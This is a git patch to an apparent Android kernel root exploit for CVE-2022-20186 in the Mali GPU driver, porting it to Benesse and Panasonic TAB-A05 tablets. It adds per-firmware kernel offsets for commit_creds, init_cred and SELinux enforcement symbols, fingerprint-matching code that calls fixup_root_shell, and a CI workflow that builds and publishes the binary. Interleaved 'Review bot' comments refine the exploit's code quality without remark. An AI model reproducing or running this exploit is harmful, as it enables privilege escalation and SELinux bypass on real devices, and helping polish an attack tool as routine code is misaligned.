From 9cad991f22aecd60670fbbea94aa6451ac779965 Mon Sep 17 00:00:00 2001
From: Syuugo
Date: Sat, 29 Jun 2024 02:05:18 +0900
Subject: [PATCH]
---
 .github/workflows/compile.yml | 27 ++++++
 .gitignore | 1 +
 mali_alias.c | 159 ++++++++++++++++++++++------------
 offsets.h | 126 +++++++++++++++++++++++++++
 4 files changed, 256 insertions(+), 57 deletions(-)
 create mode 100644 .github/workflows/compile.yml
 create mode 100644 .gitignore
 create mode 100644 offsets.h
diff --git a/.github/workflows/compile.yml b/.github/workflows/compile.yml
new file mode 100644
index 0000000..6f11493
--- /dev/null
+++ b/.github/workflows/compile.yml
@@ -0,0 +1,27 @@
+name: Compile
+
+on:
+ push:
+ paths:
+ - '*.c'
+ - '*.h'
+ - '.github/workflows/compile.yml'
+ workflow_dispatch:
+
+jobs:
+ compile:
+ name: Compile
+ runs-on: ubuntu-latest
+
+ steps:
+ - name: Checkout
+ uses: actions/checkout@v4
+
+ - name: Compile
+ run: $ANDROID_NDK/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android28-clang mali_alias.c -o mali_alias
+
+ - name: Uplaod
+ uses: actions/upload-artifact@v4
+ with:
+ name: CVE-2022-20186
+ path: mali_alias
diff --git a/.gitignore b/.gitignore
new file mode 100644
index 0000000..b5db147
--- /dev/null
+++ b/.gitignore
@@ -0,0 +1 @@
+/mali_alias
diff --git a/mali_alias.c b/mali_alias.c
index b57354a..b338dc9 100644
--- a/mali_alias.c
+++ b/mali_alias.c
@@ -1,6 +1,7 @@
 #include
 #include
 #include
+#include
 #include
 #include
 #include
@@ -11,8 +12,7 @@
 #include
 #include
-#include "stdbool.h"
-
+#include "offsets.h"
 #include "mali.h"
 #include "mali_base_jm_kernel.h"
 #include "midgard.h"
@@ -27,11 +27,11 @@
 #define POOL_SIZE 16384
-#define RESERVED_SIZE 32
+#define RESERVED_SIZE 12
 #define TOTAL_RESERVED_SIZE 1024
-#define KERNEL_BASE 0x80000000
+#define KERNEL_BASE 0x40008000
 #define OVERWRITE_INDEX 256
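Review bot: `uses: actions/checkout@v4` and `uses: actions/upload-artifact@v4` pin to mutable major tags, so a retagged release silently changes what runs in the job that builds and publishes a root-exploit binary; pin both to a full commit SHA with the version kept as a trailing comment, e.g. `uses: actions/checkout@<commit-sha> # v4`. The compile step assumes `$ANDROID_NDK` is exported by the `ubuntu-latest` image, which is presumably true today but is nothing the workflow asserts, so a future image change would surface as a bare "not found" from the shell; a preceding `test -x "$ANDROID_NDK/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android28-clang"` gives a readable failure instead. The step name `Uplaod` is misspelled and should read `Upload`.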
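Review bot: `-#include "stdbool.h"` removes the only legible `bool` header while the file still relies on it (`jh.is_64b = true;` is context in the `write_to` hunk further down), so the build now hinges either on the new `+#include` in the first hunk, whose target is not legible in this rendering, or on a transitive include from `mali.h`. If that new line is `#include <stdbool.h>` this is just a move and only a comment is needed; otherwise add `#include <stdbool.h>` next to `+#include "offsets.h"` so `true`/`false` do not depend on header order.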
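Review bot: `RESERVED_SIZE` drops from 32 to 12 and `KERNEL_BASE` from 0x80000000 to 0x40008000 with no comment, and unlike the per-build offsets these two are not keyed on the fingerprint, so they apply to all fourteen builds listed in offsets.h. Record where the values come from and what they are tied to, e.g. `#define KERNEL_BASE 0x40008000 // TAB-A05 kernels in offsets.h; oriole builds used 0x80000000` and a matching line on `RESERVED_SIZE` stating how 12 relates to `TOTAL_RESERVED_SIZE 1024`. If any of the supported builds needs a different base, it presumably belongs in the per-build offsets rather than in a global constant.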
@@ -43,45 +43,9 @@
 #define ADD_COMMIT_INDEX 3
-#define AVC_DENY_2108 0x92df1c
-
-#define SEL_READ_ENFORCE_2108 0x942ae4
-
-#define INIT_CRED_2108 0x29a0570
-
-#define COMMIT_CREDS_2108 0x180b0c
-
-#define ADD_INIT_2108 0x9115c000
-
-#define ADD_COMMIT_2108 0x912c3108
-
-#define AVC_DENY_2201 0x930af4
-
-#define SEL_READ_ENFORCE_2201 0x9456bc
-
-#define INIT_CRED_2201 0x29b0570
-
-#define COMMIT_CREDS_2201 0x183df0
-
-#define ADD_INIT_2201 0x9115c000
-
-#define ADD_COMMIT_2201 0x9137c108
-
-#define AVC_DENY_2202 0x930b50
-
-#define SEL_READ_ENFORCE_2202 0x94551c
-
-#define INIT_CRED_2202 0x29b0570
+static uint64_t sel_read_enforce;
-#define COMMIT_CREDS_2202 0x183e3c
-
-#define ADD_INIT_2202 0x9115c000 //add x0, x0, #0x570
-
-#define ADD_COMMIT_2202 0x9138f108 //add x8, x8, #0xe3c
-
-static uint64_t sel_read_enforce = SEL_READ_ENFORCE_2108;
-
-static uint64_t avc_deny = AVC_DENY_2108;
+static uint64_t avc_deny;
 static int atom_number = 1;
@@ -252,7 +216,7 @@ void write_to(int mali_fd, uint64_t gpu_addr, uint64_t value, int atom_number, e
 struct MALI_JOB_HEADER jh = {0};
 jh.is_64b = true;
 jh.type = MALI_JOB_TYPE_WRITE_VALUE;
-
+
 struct MALI_WRITE_VALUE_JOB_PAYLOAD payload = {0};
 payload.type = type;
 payload.immediate_value = value;
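Review bot: `static uint64_t sel_read_enforce;` and `static uint64_t avc_deny;` are now zero until `select_offset()` assigns them, and nothing at the declaration says that zero is never a usable offset; the invariant holds only because `select_offset()` calls `err()` on an unmatched fingerprint and `main` calls it before anything else. State that where the variables are declared, e.g. `/* kernel offsets for the running build; 0 until select_offset() fills them (it exits on an unknown fingerprint) */`. The deleted `//add x0, x0, #0x570` and `//add x8, x8, #0xe3c` annotations were the only explanation that the ADD_INIT/ADD_COMMIT values are encoded AArch64 instructions rather than addresses, and the new offsets.h does not carry that explanation forward.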
@@ -375,24 +339,105 @@ void select_offset() {
 char fingerprint[256];
 int len = __system_property_get("ro.build.fingerprint", fingerprint);
 printf("fingerprint: %s\n", fingerprint);
- if (!strcmp(fingerprint, "google/oriole/oriole:12/SD1A.210817.037/7862242:user/release-keys")) {
- avc_deny = AVC_DENY_2108;
- sel_read_enforce = SEL_READ_ENFORCE_2108;
- fixup_root_shell(INIT_CRED_2108, COMMIT_CREDS_2108, SEL_READ_ENFORCE_2108, ADD_INIT_2108, ADD_COMMIT_2108);
+
+ if(!strcmp(fingerprint, CTX_00_04_000)) {
+ avc_deny = AVC_DENY_CTX_00_04_000;
+ sel_read_enforce = SEL_READ_ENFORCE_CTX_00_04_000;
+ fixup_root_shell(INIT_CRED_CTX_00_04_000, COMMIT_CREDS_CTX_00_04_000, SEL_READ_ENFORCE_CTX_00_04_000, ADD_INIT_CTX_00_04_000, ADD_COMMIT_CTX_00_04_000);
+ return;
+ }
+
+ if(!strcmp(fingerprint, CTX_00_05_000)) {
+ avc_deny = AVC_DENY_CTX_00_05_000;
+ sel_read_enforce = SEL_READ_ENFORCE_CTX_00_05_000;
+ fixup_root_shell(INIT_CRED_CTX_00_05_000, COMMIT_CREDS_CTX_00_05_000, SEL_READ_ENFORCE_CTX_00_05_000, ADD_INIT_CTX_00_05_000, ADD_COMMIT_CTX_00_05_000);
+ return;
+ }
+
+ if(!strcmp(fingerprint, CTX_00_08_000)) {
+ avc_deny = AVC_DENY_CTX_00_08_000;
+ sel_read_enforce = SEL_READ_ENFORCE_CTX_00_08_000;
+ fixup_root_shell(INIT_CRED_CTX_00_08_000, COMMIT_CREDS_CTX_00_08_000, SEL_READ_ENFORCE_CTX_00_08_000, ADD_INIT_CTX_00_08_000, ADD_COMMIT_CTX_00_08_000);
+ return;
+ }
+
+ if(!strcmp(fingerprint, CTX_00_09_000)) {
+ avc_deny = AVC_DENY_CTX_00_09_000;
+ sel_read_enforce = SEL_READ_ENFORCE_CTX_00_09_000;
+ fixup_root_shell(INIT_CRED_CTX_00_09_000, COMMIT_CREDS_CTX_00_09_000, SEL_READ_ENFORCE_CTX_00_09_000, ADD_INIT_CTX_00_09_000, ADD_COMMIT_CTX_00_09_000);
+ return;
+ }
+
+ if(!strcmp(fingerprint, CTX_01_00_000)) {
+ avc_deny = AVC_DENY_CTX_01_00_000;
+ sel_read_enforce = SEL_READ_ENFORCE_CTX_01_00_000;
+ fixup_root_shell(INIT_CRED_CTX_01_00_000, COMMIT_CREDS_CTX_01_00_000, SEL_READ_ENFORCE_CTX_01_00_000, ADD_INIT_CTX_01_00_000, ADD_COMMIT_CTX_01_00_000);
 return;
 }
- if (!strcmp(fingerprint, "google/oriole/oriole:12/SQ1D.220105.007/8030436:user/release-keys")) {
- avc_deny = AVC_DENY_2201;
- sel_read_enforce = SEL_READ_ENFORCE_2201;
- fixup_root_shell(INIT_CRED_2201, COMMIT_CREDS_2201, SEL_READ_ENFORCE_2201, ADD_INIT_2201, ADD_COMMIT_2201);
+
+ if(!strcmp(fingerprint, CTX_01_01_001)) {
+ avc_deny = AVC_DENY_CTX_01_01_001;
+ sel_read_enforce = SEL_READ_ENFORCE_CTX_01_01_001;
+ fixup_root_shell(INIT_CRED_CTX_01_01_001, COMMIT_CREDS_CTX_01_01_001, SEL_READ_ENFORCE_CTX_01_01_001, ADD_INIT_CTX_01_01_001, ADD_COMMIT_CTX_01_01_001);
+ return;
+ }
+
+ if(!strcmp(fingerprint, CTX_01_04_000)) {
+ avc_deny = AVC_DENY_CTX_01_04_000;
+ sel_read_enforce = SEL_READ_ENFORCE_CTX_01_04_000;
+ fixup_root_shell(INIT_CRED_CTX_01_04_000, COMMIT_CREDS_CTX_01_04_000, SEL_READ_ENFORCE_CTX_01_04_000, ADD_INIT_CTX_01_04_000, ADD_COMMIT_CTX_01_04_000);
 return;
 }
- if (!strcmp(fingerprint, "google/oriole/oriole:12/SQ1D.220205.004/8151327:user/release-keys")) {
- avc_deny = AVC_DENY_2202;
- sel_read_enforce = SEL_READ_ENFORCE_2202;
- fixup_root_shell(INIT_CRED_2202, COMMIT_CREDS_2202, SEL_READ_ENFORCE_2202, ADD_INIT_2202, ADD_COMMIT_2202);
+
+ if(!strcmp(fingerprint, CTX_01_11_000)) {
+ avc_deny = AVC_DENY_CTX_01_11_000;
+ sel_read_enforce = SEL_READ_ENFORCE_CTX_01_11_000;
+ fixup_root_shell(INIT_CRED_CTX_01_11_000, COMMIT_CREDS_CTX_01_11_000, SEL_READ_ENFORCE_CTX_01_11_000, ADD_INIT_CTX_01_11_000, ADD_COMMIT_CTX_01_11_000);
+ return;
+ }
+
+ if(!strcmp(fingerprint, CTZ_00_03_000)) {
+ avc_deny = AVC_DENY_CTZ_00_03_000;
+ sel_read_enforce = SEL_READ_ENFORCE_CTZ_00_03_000;
+ fixup_root_shell(INIT_CRED_CTZ_00_03_000, COMMIT_CREDS_CTZ_00_03_000, SEL_READ_ENFORCE_CTZ_00_03_000, ADD_INIT_CTZ_00_03_000, ADD_COMMIT_CTZ_00_03_000);
+ return;
+ }
+
+ if(!strcmp(fingerprint, CTZ_01_00_000)) {
+ avc_deny = AVC_DENY_CTZ_01_00_000;
+ sel_read_enforce = SEL_READ_ENFORCE_CTZ_01_00_000;
+ fixup_root_shell(INIT_CRED_CTZ_01_00_000, COMMIT_CREDS_CTZ_01_00_000, SEL_READ_ENFORCE_CTZ_01_00_000, ADD_INIT_CTZ_01_00_000, ADD_COMMIT_CTZ_01_00_000);
 return;
 }
+
+ if(!strcmp(fingerprint, CTZ_01_01_000)) {
+ avc_deny = AVC_DENY_CTZ_01_01_000;
+ sel_read_enforce = SEL_READ_ENFORCE_CTZ_01_01_000;
+ fixup_root_shell(INIT_CRED_CTZ_01_01_000, COMMIT_CREDS_CTZ_01_01_000, SEL_READ_ENFORCE_CTZ_01_01_000, ADD_INIT_CTZ_01_01_000, ADD_COMMIT_CTZ_01_01_000);
+ return;
+ }
+
+ if(!strcmp(fingerprint, CTZ_01_02_004)) {
+ avc_deny = AVC_DENY_CTZ_01_02_004;
+ sel_read_enforce = SEL_READ_ENFORCE_CTZ_01_02_004;
+ fixup_root_shell(INIT_CRED_CTZ_01_02_004, COMMIT_CREDS_CTZ_01_02_004, SEL_READ_ENFORCE_CTZ_01_02_004, ADD_INIT_CTZ_01_02_004, ADD_COMMIT_CTZ_01_02_004);
+ return;
+ }
+
+ if(!strcmp(fingerprint, CTZ_01_02_005)) {
+ avc_deny = AVC_DENY_CTZ_01_02_005;
+ sel_read_enforce = SEL_READ_ENFORCE_CTZ_01_02_005;
+ fixup_root_shell(INIT_CRED_CTZ_01_02_005, COMMIT_CREDS_CTZ_01_02_005, SEL_READ_ENFORCE_CTZ_01_02_005, ADD_INIT_CTZ_01_02_005, ADD_COMMIT_CTZ_01_02_005);
+ return;
+ }
+
+ if(!strcmp(fingerprint, CTZ_01_03_000)) {
+ avc_deny = AVC_DENY_CTZ_01_03_000;
+ sel_read_enforce = SEL_READ_ENFORCE_CTZ_01_03_000;
+ fixup_root_shell(INIT_CRED_CTZ_01_03_000, COMMIT_CREDS_CTZ_01_03_000, SEL_READ_ENFORCE_CTZ_01_03_000, ADD_INIT_CTZ_01_03_000, ADD_COMMIT_CTZ_01_03_000);
+ return;
+ }
+
 err(1, "unable to match build id\n");
 }
@@ -491,11 +536,11 @@ int run_exploit() {
 int main() {
 setbuf(stdout, NULL);
 setbuf(stderr, NULL);
-
+
 select_offset();
 int ret = -1;
 sleep(1);
 ret = run_exploit();
- if (!ret) system("sh");
+ if (!ret) system("getenforce");
 }
diff --git a/offsets.h b/offsets.h
new file mode 100644
index 0000000..a6ba351
--- /dev/null
+++ b/offsets.h
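Review bot: The fourteen `if(!strcmp(fingerprint, CTX_…))` blocks added here repeat the same four statements with only the macro suffix changed, so the next device added is one typo away from pairing a fingerprint with another build's offsets (the `CTX_01_00_000`, `CTX_01_04_000` and `CTZ_01_00_000` blocks already pick up the old oriole blocks' `return;`/`}` as context, which hides where each block ends). A `static const` table with one row per build and a single lookup loop keeps one copy of the logic and makes the rows that share every value (`CTX_00_04_000` through `CTX_01_00_000`) visible. The `len` returned by `__system_property_get` is never used; either drop it or check it, `if (len <= 0) errx(1, "cannot read ro.build.fingerprint");`. Unrelated to this change but visible in the hunk, `err()` appends `: strerror(errno)` and its own newline, so the unmatched-build exit should be `errx(1, "unable to match build id");`. `fixup_root_shell`'s parameter types are outside this hunk, so the row fields below assume it takes plain integers.
```c
struct build_offsets {
    const char *fingerprint;
    uint64_t avc_deny, sel_read_enforce, init_cred, commit_creds, add_init, add_commit;
};

/* One row per build in offsets.h; field order follows fixup_root_shell()'s arguments. */
static const struct build_offsets builds[] = {
    { CTX_00_04_000, AVC_DENY_CTX_00_04_000, SEL_READ_ENFORCE_CTX_00_04_000,
      INIT_CRED_CTX_00_04_000, COMMIT_CREDS_CTX_00_04_000,
      ADD_INIT_CTX_00_04_000, ADD_COMMIT_CTX_00_04_000 },
    /* … one row each for the remaining CTX_* and CTZ_* builds … */
};

void select_offset() {
    char fingerprint[256];
    int len = __system_property_get("ro.build.fingerprint", fingerprint);
    printf("fingerprint: %s\n", fingerprint);
    for (size_t i = 0; i < sizeof builds / sizeof builds[0]; i++) {
        const struct build_offsets *b = &builds[i];
        if (strcmp(fingerprint, b->fingerprint) != 0)
            continue;
        avc_deny = b->avc_deny;
        sel_read_enforce = b->sel_read_enforce;
        fixup_root_shell(b->init_cred, b->commit_creds, b->sel_read_enforce, b->add_init, b->add_commit);
        return;
    }
    err(1, "unable to match build id\n");
}
```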
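Review bot: `if (!ret) system("getenforce");` discards the result of `system()` and `main` still falls off the end, so the process exits 0 whether or not `run_exploit()` succeeded and a caller scripting the binary cannot tell the two outcomes apart. Add `return ret ? 1 : 0;` after the `if`, and on the failure path report it, e.g. `else fprintf(stderr, "run_exploit failed: %d\n", ret);`. `run_exploit()` is outside this hunk, so whether its non-zero returns carry distinct meanings worth surfacing is not visible here.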
@@ -0,0 +1,126 @@
+
+// TAB-A05-BD 00.04.000
+#define CTX_00_04_000 "benesse/TAB-A05-BD/TAB-A05-BD:9/00.04.000/00.04.000:user/release-keys"
+#define COMMIT_CREDS_CTX_00_04_000 0x5a120
+#define AVC_DENY_CTX_00_04_000 0x35acc8
+#define SEL_READ_ENFORCE_CTX_00_04_000 0x3653a8
+#define INIT_CRED_CTX_00_04_000 0x11553f0
+#define ADD_INIT_CTX_00_04_000 0x910fc000
+#define ADD_COMMIT_CTX_00_04_000 0x91048108
+
+// TAB-A05-BD 00.05.000
+#define CTX_00_05_000 "benesse/TAB-A05-BD/TAB-A05-BD:9/00.05.000/00.05.000:user/release-keys"
+#define COMMIT_CREDS_CTX_00_05_000 0x5a120
+#define AVC_DENY_CTX_00_05_000 0x35acc8
+#define SEL_READ_ENFORCE_CTX_00_05_000 0x3653a8
+#define INIT_CRED_CTX_00_05_000 0x11553f0
+#define ADD_INIT_CTX_00_05_000 0x910fc000
+#define ADD_COMMIT_CTX_00_05_000 0x91048108
+
+// TAB-A05-BD 00.08.000
+#define CTX_00_08_000 "benesse/TAB-A05-BD/TAB-A05-BD:9/00.08.000/00.08.000:user/release-keys"
+#define COMMIT_CREDS_CTX_00_08_000 0x5a120
+#define AVC_DENY_CTX_00_08_000 0x35acc8
+#define SEL_READ_ENFORCE_CTX_00_08_000 0x3653a8
+#define INIT_CRED_CTX_00_08_000 0x11553f0
+#define ADD_INIT_CTX_00_08_000 0x910fc000
+#define ADD_COMMIT_CTX_00_08_000 0x91048108
+
+// TAB-A05-BD 00.09.000
+#define CTX_00_09_000 "benesse/TAB-A05-BD/TAB-A05-BD:9/00.09.000/00.09.000:user/release-keys"
+#define COMMIT_CREDS_CTX_00_09_000 0x5a120
+#define AVC_DENY_CTX_00_09_000 0x35acc8
+#define SEL_READ_ENFORCE_CTX_00_09_000 0x3653a8
+#define INIT_CRED_CTX_00_09_000 0x11553f0
+#define ADD_INIT_CTX_00_09_000 0x910fc000
+#define ADD_COMMIT_CTX_00_09_000 0x91048108
+
+// TAB-A05-BD 01.00.000
+#define CTX_01_00_000 "benesse/TAB-A05-BD/TAB-A05-BD:9/01.00.000/01.00.000:user/release-keys"
+#define COMMIT_CREDS_CTX_01_00_000 0x5a120
+#define AVC_DENY_CTX_01_00_000 0x35acc8
+#define SEL_READ_ENFORCE_CTX_01_00_000 0x3653a8
+#define INIT_CRED_CTX_01_00_000 0x11553f0
+#define ADD_INIT_CTX_01_00_000 0x910fc000
+#define ADD_COMMIT_CTX_01_00_000 0x91048108
+
+// TAB-A05-BD 01.01.001
+#define CTX_01_01_001 "benesse/TAB-A05-BD/TAB-A05-BD:9/01.01.001/01.01.001:user/release-keys"
+#define COMMIT_CREDS_CTX_01_01_001 0x5a120
+#define AVC_DENY_CTX_01_01_001 0x35acc8
+#define SEL_READ_ENFORCE_CTX_01_01_001 0x365418
+#define INIT_CRED_CTX_01_01_001 0x11653f0
+#define ADD_INIT_CTX_01_01_001 0x910fc000
+#define ADD_COMMIT_CTX_01_01_001 0x91048108
+
+// TAB-A05-BD 01.04.000
+#define CTX_01_04_000 "benesse/TAB-A05-BD/TAB-A05-BD:9/01.04.000/01.04.000:user/release-keys"
+#define COMMIT_CREDS_CTX_01_04_000 0x5a120
+#define AVC_DENY_CTX_01_04_000 0x35ac10
+#define SEL_READ_ENFORCE_CTX_01_04_000 0x365360
+#define INIT_CRED_CTX_01_04_000 0x11653f0
+#define ADD_INIT_CTX_01_04_000 0x910fc000
+#define ADD_COMMIT_CTX_01_04_000 0x91048108
+
+// TAB-A05-BD 01.11.000
+#define CTX_01_11_000 "benesse/TAB-A05-BD/TAB-A05-BD:9/01.11.000/01.11.000:user/release-keys"
+#define COMMIT_CREDS_CTX_01_11_000 0x5a120
+#define AVC_DENY_CTX_01_11_000 0x359c20
+#define SEL_READ_ENFORCE_CTX_01_11_000 0x364370
+#define INIT_CRED_CTX_01_11_000 0x11653f0
+#define ADD_INIT_CTX_01_11_000 0x910fc000
+#define ADD_COMMIT_CTX_01_11_000 0x91048108
+
+// TAB-A05-BA1 00.03.000
+#define CTZ_00_03_000 "Panasonic/TAB-A05-BA1/TAB-A05-BA1:9/00.03.000/00.03.000:user/release-keys"
+#define COMMIT_CREDS_CTZ_00_03_000 0x5a120
+#define AVC_DENY_CTZ_00_03_000 0x359c20
+#define SEL_READ_ENFORCE_CTZ_00_03_000 0x364370
+#define INIT_CRED_CTZ_00_03_000 0x11753f0
+#define ADD_INIT_CTZ_00_03_000 0x910fc000
+#define ADD_COMMIT_CTZ_00_03_000 0x91048108
+
+// TAB-A05-BA1 01.00.000
+#define CTZ_01_00_000 "Panasonic/TAB-A05-BA1/TAB-A05-BA1:9/01.00.000/01.00.000:user/release-keys"
+#define COMMIT_CREDS_CTZ_01_00_000 0x5a120
+#define AVC_DENY_CTZ_01_00_000 0x359c20
+#define SEL_READ_ENFORCE_CTZ_01_00_000 0x364370
+#define INIT_CRED_CTZ_01_00_000 0x11653f0
+#define ADD_INIT_CTZ_01_00_000 0x910fc000
+#define ADD_COMMIT_CTZ_01_00_000 0x91048108
+
+// TAB-A05-BA1 01.01.000
+#define CTZ_01_01_000 "Panasonic/TAB-A05-BA1/TAB-A05-BA1:9/01.01.000/01.01.000:user/release-keys"
+#define COMMIT_CREDS_CTZ_01_01_000 0x5a120
+#define AVC_DENY_CTZ_01_01_000 0x359a68
+#define SEL_READ_ENFORCE_CTZ_01_01_000 0x3641b8
+#define INIT_CRED_CTZ_01_01_000 0x11653f0
+#define ADD_INIT_CTZ_01_01_000 0x910fc000
+#define ADD_COMMIT_CTZ_01_01_000 0x91048108
+
+// TAB-A05-BA1 01.02.004
+#define CTZ_01_02_004 "Panasonic/TAB-A05-BA1/TAB-A05-BA1:9/01.02.004/01.02.004:user/release-keys"
+#define COMMIT_CREDS_CTZ_01_02_004 0x5a120
+#define AVC_DENY_CTZ_01_02_004 0x35bad0
+#define SEL_READ_ENFORCE_CTZ_01_02_004 0x366190
+#define INIT_CRED_CTZ_01_02_004 0x11a53f0
+#define ADD_INIT_CTZ_01_02_004 0x910fc000
+#define ADD_COMMIT_CTZ_01_02_004 0x91048108
+
+// TAB-A05-BA1 01.02.005
+#define CTZ_01_02_005 "Panasonic/TAB-A05-BA1/TAB-A05-BA1:9/01.02.005/01.02.005:user/release-keys"
+#define COMMIT_CREDS_CTZ_01_02_005 0x5a120
+#define AVC_DENY_CTZ_01_02_005 0x35bad0
+#define SEL_READ_ENFORCE_CTZ_01_02_005 0x366190
+#define INIT_CRED_CTZ_01_02_005 0x11a53f0
+#define ADD_INIT_CTZ_01_02_005 0x910fc000
+#define ADD_COMMIT_CTZ_01_02_005 0x91048108
+
+// TAB-A05-BA1 01.03.000
+#define CTZ_01_03_000 "Panasonic/TAB-A05-BA1/TAB-A05-BA1:9/01.03.000/01.03.000:user/release-keys"
+#define COMMIT_CREDS_CTZ_01_03_000 0x5a120
+#define AVC_DENY_CTZ_01_03_000 0x35bad0
+#define SEL_READ_ENFORCE_CTZ_01_03_000 0x366190
+#define INIT_CRED_CTZ_01_03_000 0x11a53f0
+#define ADD_INIT_CTZ_01_03_000 0x910fc000
+#define ADD_COMMIT_CTZ_01_03_000 0x91048108